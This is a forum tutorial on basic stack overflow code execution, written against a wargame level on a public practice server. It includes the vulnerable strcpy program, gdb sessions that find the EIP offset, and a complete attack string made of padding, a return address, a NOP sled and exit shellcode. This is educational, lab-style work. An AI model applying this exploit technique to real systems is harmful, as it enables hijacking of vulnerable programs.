Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking Tips (http://www.go4expert.com/articles/ethical-hacking-tutorials/)
-   -   Stack Overflow Code Execution Basics (http://www.go4expert.com/articles/stack-overflow-code-execution-basics-t24937/)

lionaneesh 10Feb2011 22:36

Stack Overflow Code Execution Basics
 
This is a continuation of my previous article on Stack Overflows - Basics of EIP Overwrite..I suggest a glance over it before reading further...

Again in this article we'll be using a vulnerable program to demonstrate our attack..
Our main motive is to change the direction of the vulnerable program and make it do what we want from it to do...

In this article I am now bringing the exploitation to a new level..We'll be exploiting a simple Wargame level example

And i'll be exploiting this code using their machine only..

Exploiting


Code: c

#include <stdio.h>

#include <string.h>

int main(int argc, char **argv) {

    char buf[128];

    if(argc < 2) return 1;

    strcpy(buf, argv[1]);

    printf("%s\n", buf);   

    return 0;

}

I'll be using a basic exit shellcode for demonstration purposes but any shellcode of a considerable size can be used to exploit this program..

SO lets wear our grey thinking hats and get started..

Basically to exploit this program we have to overwrite th EIP register which we have already learnt How? In the previos tutorial...So...I'll nnot be repeating that...

Now what we want is to overwrite the EIP and make it point to our shellcode to gramt us the remote controler..

So lets first ssh to their machine :-

Code:

aneesh@aneesh-laptop:~$ ssh level5@io.smashthestack.org -p2224

level5@io.smashthestack.org's password:

 ______  _____

/\__  _\ /\  __`\

\/_/\ \/ \ \ \/\ \      Levels are in /levels

  \ \ \  \ \ \ \ \    Passes are in ~/.pass

    \_\ \__\ \ \_\ \

    /\_____\\ \_____\  Server admin: beach (beach@smashthestack.org)

    \/_____/ \/_____/  Server janitor: bla



        1. No DoS, local or otherwise

        2. Do not try to connect to remote systems from this box

        3. Only two connections per IP are allowed

        4. Quotas are in place so don't waste resources

        5. This rules list is not all inclusive and is subject to change

        6. Have fuN++



                                (28 levels)



- use long(>5char) names in /tmp, short stuff is periodically deleted, as are

easily guessable ones

- o and feel free to leave your email in /home/email.list (it's writeonly)



-  Thanks everybody for the new translations!



level5@io:~$
level5@io:~$ cd /levels/

level5@io:/levels$ ls

beta              level06_alt        level10      level16              level23.c

level01        level06_alt.c        level10.c    level16.c      level24

level02        level06_alt.pass  level11      level16.pass  level24.c

level02_alt    level06.c        level11.c    level17              level25

level02_alt.c  level07                level12      level17.c      level25.c

level03        level07_alt        level12.c    level18              level26

level03.c      level07_alt.c        level12.pass  level18.c      level26.l

level04        level07.c        level13      level18_cross  level26.y

level04.c      level08                level13.c    level19              level27

level05        level08_alt        level14      level19.c      level27.c

level05_alt    level08_alt.cpp        level14.c    level20              level27.pass

level05_alt.c  level08.c        level15      level21              level28

level05.c      level09                level15.c    level22              level28.c

level06        level09.c        level15.pass  level23

level5@io:/levels$ cat level0

level01          level04.c        level06_alt.c    level08

level02          level05          level06_alt.pass  level08_alt

level02_alt      level05_alt      level06.c        level08_alt.cpp

level02_alt.c    level05_alt.c    level07          level08.c

level03          level05.c        level07_alt      level09

level03.c        level06          level07_alt.c    level09.c

level04          level06_alt      level07.c       

level5@io:/levels$ cat level0

level01          level04.c        level06_alt.c    level08

level02          level05          level06_alt.pass  level08_alt

level02_alt      level05_alt      level06.c        level08_alt.cpp

level02_alt.c    level05_alt.c    level07          level08.c

level03          level05.c        level07_alt      level09

level03.c        level06          level07_alt.c    level09.c

level04          level06_alt      level07.c       

level5@io:/levels$ cat level0

level01          level04.c        level06_alt.c    level08

level02          level05          level06_alt.pass  level08_alt

level02_alt      level05_alt      level06.c        level08_alt.cpp

level02_alt.c    level05_alt.c    level07          level08.c

level03          level05.c        level07_alt      level09

level03.c        level06          level07_alt.c    level09.c

level04          level06_alt      level07.c       

level5@io:/levels$ cat level05

level05        level05_alt    level05_alt.c  level05.c     

level5@io:/levels$

Note : i'll not be revealing the password for this level as its not allowed..

Lets now run it in GDB and exploit :-

Code:

level5@io:/levels$ gdb ./level05

GNU gdb 6.8-debian

Copyright (C) 2008 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.  Type "show copying"

and "show warranty" for details.

This GDB was configured as "i486-linux-gnu"...

(gdb)

Now lets just place a breakpoint at

Now lets place a breakpoint on the beginning of the program and lets run it...

Code:

(gdb) break main

Breakpoint 1 at 0x80483bd

Lets just run it with a argument of 160 A's..
We'll be using basic python code to make our Attack-string(input)...
Code:

(gdb) run `python -c 'print"\x41"*160'`
Starting program: /levels/level05 `python -c 'print"\x41"*160'`
Breakpoint 1, 0x080483bd in main ()

Now just step down the program and see what happens

Code:

(gdb) s

Single stepping until exit from function main,

which has no line number information.

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

0x41414141 in ?? ()

(gdb)

Ok that's pretty obvious that we have overwriiten the EIP with 0x41414141...(As its giving a cannot access memory at adress...As 0x41414141 is a random address and is not present in the present program user space and thus, the program cannot jump to it..)

Now lets try some various outputs to get a basic structure of what's happening..

Code:

(gdb) run `python -c 'print"\x41"*140'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y



Starting program: /levels/level05 `python -c 'print"\x41"*140'`



Breakpoint 1, 0x080483bd in main ()

(gdb) s

Single stepping until exit from function main,

which has no line number information.

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Cannot access memory at address 0x41414145

(gdb)

So , now can you feel something …

It basically means that to overwrite EIP with our desired Address we conclude with the following attack string :-

Code:

[Garbage string]    [EIP]
      |                          |
      |                          |
Should be 140        The desired
chars long                address overwrite

Lets test it :-

Code:

(gdb) run `python -c 'print"\x41"*140+"\x42"*4'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y



Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4'`



Breakpoint 1, 0x080483bd in main ()

(gdb) s

Single stepping until exit from function main,

which has no line number information.

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

0x42424242 in ?? ()

Boom... We have total control over EIP overwrite...
Now we need to inject our shellcode..and point to it..

Lets first look where our data goes..

Code:

(gdb) run `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y



Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x42"*4+"\x43"*10'`



Breakpoint 1, 0x080483bd in main ()

(gdb) s

Single stepping until exit from function main,

which has no line number information.

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCC

0x42424242 in ?? ()

(gdb) x/10bx $esp

0xbfffdc80:        0x43        0x43        0x43        0x43        0x43        0x43        0x43        0x43

0xbfffdc88:        0x43        0x43

(gdb)

Ok so from the above we conclude with the following attack-string

Code:

[Garbage string]    [EIP]                        [ESP]
      |                          |                                  |
      |                          |                                  |
Should be 140        The desired                The desired
chars long                address overwrite          data to enter in esp(stack)

So we have a large about of data space in the ESP..We can just overwrite it with our shellcode and overwrite the EIP with its address..

Lets do it!!

We'll again be using the same exit shellcode made in our previous article...

Code:

(gdb) run `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y



Starting program: /levels/level05 `python -c 'print"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"'`



Breakpoint 1, 0x080483bd in main ()

(gdb) s

Single stepping until exit from function main,

which has no line number information.

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������������1��#1۳̀

0xbfffdc80 in ?? ()

(gdb) continue

Continuing.



Program exited with code 07.

(gdb)

Woah!! We did it.. Now the explanation

Attack-string
Code:

"\x41"*140+"\x80\xdc\xff\xbf"+"\x90"*10+"\x31\xc0\xb0\x01\x31\xdb\xb3\x07\xcd\x80"
        |                          |                            |                                  |
        |                          |                            |                                  |
  Garbage            Hard coded        [NOP - ]                  The exit shellcode
  String                address of esp in  [SLED ]
                  the little endian format

The NOP-Sled is simply a set of \x90(nop) instructions this istruction basically does nothing..
We used this to make our attack-string more usable... as with every new execution of the program the address will somewhat change..If we'll not be using the nop sled … Our attack-string will fail...

Thats all for this article..Stay tuned for more

lionaneesh 12Feb2011 11:01

Re: Stack Overflow Code Execution Basics
 
Thanks for accepting...
Hope people can get a better understanding of Stack overflows


All times are GMT +5.5. The time now is 06:08.